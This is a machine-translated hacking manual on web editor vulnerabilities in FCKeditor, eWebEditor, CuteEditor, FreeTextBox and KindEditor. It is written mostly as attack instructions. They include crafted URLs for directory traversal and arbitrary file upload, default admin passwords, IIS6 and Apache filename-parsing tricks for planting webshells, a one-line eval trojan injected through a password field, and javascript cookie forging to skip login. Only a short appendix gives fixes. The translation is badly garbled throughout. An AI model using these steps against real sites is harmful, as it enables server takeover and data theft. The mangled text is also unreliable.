Web editor vulnerability manual comprehensive Edition-vulnerability warning-the black bar safety net

FCKeditor
FCKeditor editor page/view Editor Version/view the file upload path
FCKeditor editor page
FCKeditor/_samples/default.html

View Editor Version
FCKeditor/_whatsnew.html

View the file upload path
fckeditor/editor/filemanager/browser/default/connectors/asp/connector. asp? Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

The XML page in the second line “url=/xxx”part is the default reference upload path

Note:[Hell1]as of 2 0 1 0 year 0 2 Month 1 5, the latest version of FCKeditor v2. 6. 6
[Hell2]remember to modify two asp for FCKeditor actual use of script language

FCKeditor passive restriction policy caused the filter is not strict problem
Affected version: FCKeditor x. x <= FCKeditor v2. 4. 3
Vulnerability description:
FCKeditor v2. 4. 3 File categories default deny upload type: html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|
pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm

Fckeditor 2.0 <= 2.2 allows you to upload asa, cer, php2 and php4, inc, a pwml, the pht suffix of the file
After uploading it to save the files directly with the$sFilePath = $sServerDir . $s filename, without the use of$sExtension as a suffix
Directly resulted in a win the following in the upload files back plus a. To break[not tested]
And in the apache as"Apache filename parsing flaw vulnerability"can also be used, see"Appendix A"

It is also proposed that other upload vulnerability in the definition of TYPE variables when using the File class to upload the file,according to the FCKeditor in the code, which limits the most narrow.
Attack use:
Allow any other suffix upload

Note:[Hell1]the original: the<http://superhei.blogbus.com/logs/2006/02/1916091.html&gt;

The use of 2 0 0 3 path parsing vulnerability upload net horse
Affected version: Appendix B
Vulnerability description:
The use of 2 0 0 3 The system path parsing vulnerability principle, to create a similar“bin. asp”so the General of the directory, then this directory in the Upload file can be a script interpreter to a corresponding script permission to execute.
Attack use:
fckeditor/editor/filemanager/browser/default/browser. html? Type=Image&Connector=connectors/asp/connector. asp

FCKeditor PHP upload arbitrary file vulnerability

Affected version: FCKeditor 2.2 <= FCKeditor 2.4.2
Vulnerability description:
FCKeditor in processing file upload when there is an input validation error, a remote attack can exploit this vulnerability to upload arbitrary files.
By editor/filemanager/upload/php/upload. php Upload file when the attacker can pass for the Type parameter defines the invalid value causes upload any scripts.
A successful attack requires config. php configuration file to enable the file upload, which is disabled by default. Attack use: (please modify the action field to specify the URL): the
FCKeditor the=2.4.2 for php.html
Note:If you want to try v2. Version 2 vulnerability, modify the Type=any value, but note that if you change back to using the Media you must capitalize the first letter of M,otherwise LINUX, FCKeditor on the file directory for file Elite test, will not upload successfully.

TYPE the custom variable arbitrary file upload vulnerability

Affected version: earlier version
Vulnerability description:
By customizing the Type of the variable parameters, you can create or upload files to the specified directory, and there is no Upload File format restrictions.
Attack exploit: /FCKeditor/editor/filemanager/browser/default/browser. html? Type=all&Connector=connectors/asp/connector. asp

Open this address you can upload any type of file, the Shell is uploaded to the default location is:
<http://www.heimian.com/UserFiles/all/1.asp&gt;
“Type=all” this variable is the custom,in here to create all this directories,and new directories not Upload File format restrictions.

For example, enter:
/FCKeditor/editor/filemanager/browser/default/browser. html? Type=…/&Connector=connectors/asp/connector. asp
Net horse can pass to the site’s root directory.
Note:If you can’t find the default upload folder you can check this file: fckeditor/editor/filemanager/browser/default/connectors/asp/connector. asp? Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor newsgroup member traversal directory vulnerability
Affected version:aspx version of the FCKeditor, the rest of the versions not tested
Vulnerability Description: How to get the webshell please refer to the above“TYPE custom variable arbitrary file upload vulnerability”
Attack use:
Modify the CurrentFolder parameter to use …/…/to go into a different directory
/browser/default/connectors/aspx/connector. aspx? Command=CreateFolder&Type=Image&CurrentFolder=…/…/…%2F&NewFolderName=aspx. asp

According to the returned XML information can view the website in all the directories.
/browser/default/connectors/aspx/connector. aspx? Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F

FCKeditor in webshell the other upload
Affected versions:a non-optimized/streamlined version of FCKeditor
Vulnerability description:
If the presence of the following files, open after you can upload files.
Attack use:
fckeditor/editor/filemanager/upload/test.html
fckeditor/editor/filemanager/browser/default/connectors/test.html

FCKeditor file uploads“.” Change“_”underscores the bypass method
Affected version: FCKeditor => 2.4. x
Vulnerability description:
We upload the file for example: shell.php.rar或shell.php;. jpg becomes shell_php;. jpg this is the new version of the FCK change.
Attack use:
提交 1.php+space you can go around all,
※However, spaces only support win system is *nix is not supported[1.php和1.php+spaces is 2 different files]

Note:upload/2010/3/201003102334372778.jpg this format do the filtering. That is, IIS6 parsing vulnerability.
Upload for the first time. Be filtered for 123_asp;123.jpg so is not running.
But the first 2 times to upload the same file 1 2 3. asp;1 2 3. jpg after. Due to the”123_asp;123.jpg”already exists.
The file name is named as 1 2 3. asp;1 2 3(1). jpg… 1 2 3. asp;1 2 3(2). jpg such a numbering.
So. IIS6 vulnerabilities continue to perform.

If through the above steps the test is not successful, there may be the following several reasons:

1. FCKeditor does not open the file upload Function, This function in the installation of FCKeditor when the default is off. If you want to upload a file, the FCKeditor would give the wrong message.
2. The site uses a streamlined version of the FCKeditor, the Lite FCKeditor many features missing, including file upload functions.
3. FCKeditor of this vulnerability has been fixed.

--------------------------------------------------------------------------------
eWebEditor
eWebEditor use the basics
Default background address:/ewebeditor/admin_login. asp
Recommended best detection admin_style. asp whether the file can be accessed directly

Default database path: [PATH]/db/ewebeditor. mdb
[PATH]/db/db. mdb-some CMS’s in the database
You can also try [PATH]/db/%23ewebeditor. mdb-some administrators smartass little trick

Use the default password: admin/admin888 or admin/admin into the background, you can also try admin/1 2 3 4 5 6 some administrators, and some of the CMS’s settings.

Click on the“style management” - you can select a new style, or modify a non-system style, where the picture controls the allowed upload types, add|asp,|asa,|aaspsp and|or CERs, as long as the server allows execution.The script type can, click“Submit”and set the toolbar - “Insert Picture”to add controls. And then–preview this style, click Insert image, upload WEBSHELL, in“code”mode to view the file upload path.

2, when the database is administrator to modify for asp, asa suffix, can be inserted the word Trojan Client Access to the database, then the word Trojan client connect scored webshell
3, the upload cannot be performed? Directory no permissions? Handsome pot you go back to the style of management see you edited the style, which can be a custom upload path!!!
4, the set the upload type, still upload not? Estimation is file code is changed, you can try to set the“remote type”in accordance with 6. 0 version get the SHELL way to do see below for details↓, and can be set to automatically save the remote file type.
5, can not add a toolbar, but set a style in the file type, what should I do?↓ Do it!
(Please modify the action field)
Action.html

eWebEditor step on the footprints of Formula invasion
Vulnerability description:
When we download the database after the query is less than the password MD5 of the plaintext, you can go and see webeditor_style(1 4)This style sheet, see if there are predecessors of the invasion had perhaps already given up some control to upload the script the ability to construct the address to upload our own WEBSHELL.
Attack use:
Such as ID=4 6 s-name =standard1
Configuration code: ewebeditor. asp? id=content&style=standard
ID and and the style name changed after
ewebeditor. asp? id=4 6&style=standard1

eWebEditor traversal directory vulnerability
Vulnerability description:
ewebeditor/admin_uploadfile. asp
admin/upload. asp
The filter is not strict, resulting in the traversal directory vulnerability
Attack use:
First:ewebeditor/admin_uploadfile. asp? id=1 4
In id=1 4 behind add&dir=…
Plus &dir=…/…
&dir=http://www. heimian. com/…/… look to the entire website file.
Second: ewebeditor/admin/upload. asp? id=1 6&d_viewmode=&dir =./…

eWebEditor 5.2 column directory vulnerability
Vulnerability description:
ewebeditor/asp/browse. asp
The filter is not strict, resulting in the traversal directory vulnerability
Attack use:
[http://www.heimian.com/ewebeditor/asp/browse.asp?style=standard650&amp;dir=...././/] (<http://www.heimian.com/ewebeditor/asp/browse.asp?style=standard650&dir=...././/&gt;)…

Use WebEditor session spoofing vulnerability,into the background
Vulnerability description:
Vulnerability file:Admin_Private. asp
Only the judgment of the session, did not determine the cookies and path verification problem.
Attack use:
Create a new test. asp reads as follows:
<%Session(“eWebEditor_User”) = “1 1 1 1 1 1 1 1”%>
To access the test. asp, and then access the backend of any file, for example:Admin_Default. asp

eWebEditor asp version 2.1.6 upload vulnerability
Attack use: please modify the action field for the specified URL
ewebeditor asp 版 2.1.6 上传 漏洞 利用 程序 .html

eWebEditor 2.7.0 injection vulnerability
Attack use:
http://www.heimian.com/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200
The default table name: eWebEditor_System default column name: sys_UserName, the sys_UserPass, and then use nbsi to guess.

eWebEditor2. 8. 0 Ultimate Edition delete arbitrary file vulnerability
Vulnerability description:
This vulnerability is present in Example\NewsSystem directory delete. asp file, which is ewebeditor test page, without the login can be entered directly.
Attack use: (please modify the action field to specify the URL)
Del Files.html

eWebEditor v6. 0. 0 Upload vulnerability
Attack use:
In the Editor click the“Insert image”–the network–enter your WEBSHELL in a space on the address note: the file name must be: xxx. jpg. asp and so on…, Is determined, click on the“remote files automatic upload”controls first upload you will be prompted to install the control, wait to view the“code”mode to find the file upload path, the access can be, eweb official DEMO can also do this, but uploading the directory to cancel out the Execute permissions, so upload up also unable to perform the net horse.

eWebEditor for PHP/ASP…backstage pass to kill vulnerability
Affected versions: PHP ≥ 3.0~3.8 with the asp version 2.8 also, maybe a low version is also available, to be tested.
Attack use:
进入 后台 /eWebEditor/admin/login.php,just enter a user and password,will prompt an error.
This time you empty the browser’s url,and then enter

javascript:alert(document. cookie=“adminuser=”+escape(“admin”));
javascript:alert(document. cookie=“adminpass=”+escape(“admin”));
javascript:alert(document. cookie=“admindj=”+escape(“1”));

Then three carriage return,empty the browser’s URL,现在 输入 一些 平常 访问 不到 的 文件 如 …/ewebeditor/admin/default.php will directly into it.

eWebEditor for php arbitrary file upload vulnerability
Affected version:ewebeditor for php v3. 8 or older version
Vulnerability description:
This version will all the style of the configuration information is saved as an array$aStyle,in php. ini configuration register_global is on the case we can add any your favorite style and define the upload type.
Attack use:
phpupload.html

eWebEditor JSP version vulnerability
Much the same, I in this document do not want to say more, because no test environment, the online dump so big, bad investigation. With the JSP editor, I think eweb would be better than FCKeditor share much less.
Given a connection:<http://blog.haaker.cn/post/161.html&gt;
There are:<http://www.anqn.com/zhuru/article/all/2008-12-04/a09104236.shtml&gt;

eWebEditor 2.8 Business Edition inserted the word Trojan
Affected version:=>2.8 Business Edition
Attack use:
Login background, click on Change Password—new password set to 1":eval request(“h”)’
Set after the success, the access to asp/config. asp file, the word Trojan is written to this file inside.

eWebEditorNet upload. aspx upload vulnerability(WebEditorNet)
Vulnerability description:
WebEditorNet is mainly a upload. aspx file there upload vulnerability.
Attack use:
The default upload address:/ewebeditornet/upload. aspx
You can directly Upload a cer Trojan
If you can not upload it in the browser address bar enter javascript:lbtnUpload. click();
After the success of the view source to find uploadsave view upload to save the address, the default passed to the uploadfile this folder.

southidceditor(General use v2. 8. 0 version eWeb core)
<http://www.heimian.com/admin/southidceditor/datas/southidceditor.mdb&gt;
<http://www.heimian.com/admin/southidceditor/admin/admin_login.asp&gt;
<http://www.heimian.com/admin/southidceditor/popup.asp&gt;

bigcneditor(eWeb 2.7.5 VIP core)
In fact, the so-called Bigcneditor is eWebEditor 2.7.5 VIP user version. The reason why can not access admin_login. asp, it says“insufficient permissions”4 word Mantra that estimate is because it authorized“Licensed”issue,perhaps allowing only authorized machines to access the backend.

Perhaps above for eWebEditor v2. 8 following a low version of the little tricks you can use to up here. Looks like not much action?
--------------------------------------------------------------------------------
Cute Editor
Cute Editor online editor local include vulnerability
Affected version:
CuteEditor For Net 6.4
Vulnerability description:
You can feel free to view the website contents of the file, and the harm is large.
Attack use:
http://www.heimian.com/CuteSoft_Client/CuteEditor/Load. ashx? type=image&file=…/…/…/web. config

--------------------------------------------------------------------------------
Webhtmleditor
Use WIN 2 0 0 3 IIS file the name resolution vulnerability to get a SHELL
Affected versions:<= Webhtmleditor final version 1. 7 (stopped updating)
Vulnerability description/attack:
Uploading pictures or other files without the rename operation, resulting in allows malicious users to upload diy. asp;. jpg to bypass the extension a review of the restrictions, for such due Editor The author aware of the errors committed, even if the encounter a thumbnail, the file header detection, you can also use pictures of the Trojan inserted into a word to break.

--------------------------------------------------------------------------------
Kindeditor
Use WIN 2 0 0 3 IIS file the name resolution vulnerability to get a SHELL
Affected versions: <= kindeditor 3.2.1(0 9 years 8 months release of the latest version)
Vulnerability description/attack:
Get the official do a demo: 进入upload/2010/3/201003102334381513.jpg you can go to onlookers.
Note:see Appendix C of the principles of the resolution.

--------------------------------------------------------------------------------
Freetextbox
Freetextbox traversal directory vulnerability
Affected versions: unknown
Vulnerability description:
Because the ftb. imagegallery. aspx code only the filtered/but there is no filter\symbol so the result appeared to traverse the directory problem.
Attack use:
The editor of the page points the picture will pop up a box clutch to give this address）constructed as follows, You can traverse the directory.
[http://www.heimian.com/Member/images/ftb/HelperScripts/ftb.imagegallery.aspx?frame=1&amp;rif=..&amp;cif=\](<http://www.heimian.com/Member/images/ftb/HelperScripts/ftb.imagegallery.aspx?frame=1&rif=..&cif=&gt;)…
--------------------------------------------------------------------------------

Appendix A:
Apache file name parsing flaw vulnerabilities:
Test environment:apache 2.0.53 winxp,apache 2.0.52 redhat linux

1. Abroad(SSR TEAM)made a more advisory said Apache’s MIME module (mod_mime)related to vulnerability,is the attack. php. rar will be treated as php File Execution vulnerabilities, including Discuz! The p11. php. php. php. php. php. php. php. php. php. php. php. php. rar vulnerabilities.

2. S4T the superhei in a blog post on this apache of small characteristic, i.e., the apache is starting from the back to check the suffix, according to the last legitimate the suffix implementation. In fact, just look at the apache htdocs to those installed by default index. The XX files will understand.

3. superhei have said very clearly, can take advantage of in upload vulnerability, I in accordance with generally allow the upload of the file formats tested include the following(chaotic classification not to blame)
   Typical type:rar
   Backup type:bak,lock
   Flow media type: wma,wmv,asx,as,mp4,rmvb
   Microsoft:sql,chm,hlp,shtml,asp
   Any type:test,fake,ph4nt0m
   Special type:torrent
   Program Type: jsp,c,cpp,pl,cgi

4. The entire vulnerability is the key to apache’s"legitimate suffix"in the end is what, not"legitimate suffix"can be used.

5. The test environment
   a.php
   <? phpinfo();?& gt;
   Then add any suffix test,a. php. aaa,a. php. aab…

By cloie, in ph4nt0m.net© Security.

Appendix B:
Install the iis6 Server(Windows 2003), the affected file name suffix. asp . asa . cdx . cer . pl . php . cgi

Windows 2 0 0 3 Enterprise Edition is Microsoft’s mainstream server[operating system](<http://www.myhack58.com/Article/48/Article_048_1.htm&gt; a). Windows 2 0 0 3 IIS6 existence of the file parsing the path of vulnerability, when the folder named similar to hack. asp when that folder name looks like an ASP file, the file name, then under this folder any type of file(比如 .gif the. jpg, the. txt, etc.) are available in the IIS is used as the ASP program to execute. This hack can be uploaded with the extension jpg or gif and the like look like Is the picture file of the Trojan file, by accessing this file to run the Trojan. If these sites have any one of the folder’s name is . asp . php . cer . asa . cgi . pl, etc. at the end, then put in these folders any of the following types of files are likely to be considered to be script files to the script parser and executed.

Appendix C:
Vulnerability description:
When the file name is[YYY]. asp;[ZZZ]. jpg, Microsoft IIS will automatically to the asp format to be parsed.
And when the file name is[YYY]. php;[ZZZ]. jpg, Microsoft IIS will automatically in php format to be parsed.
Where[YYY]with[ZZZ]is a variable of string.
Affected platforms:
Windows Server 2 0 0 0 / 2 0 0 3 / 2 0 0 3 R2 (IIS 5. x / 6.0)
Repair method:
1, wait for the Microsoft relevant patch
2, The closing image of the directory where the script execution permissions if you some of the pictures are not with the program mixed storage）
3, check the website of the program all Upload a picture of the code segment, of the form[YYY]. asp;[ZZZ]. jpg pictures do intercept
Note:
For Windows Server 2 0 0 8(IIS7)and Windows Server 2 0 0 8 R2(IIS7. 5) is unaffected.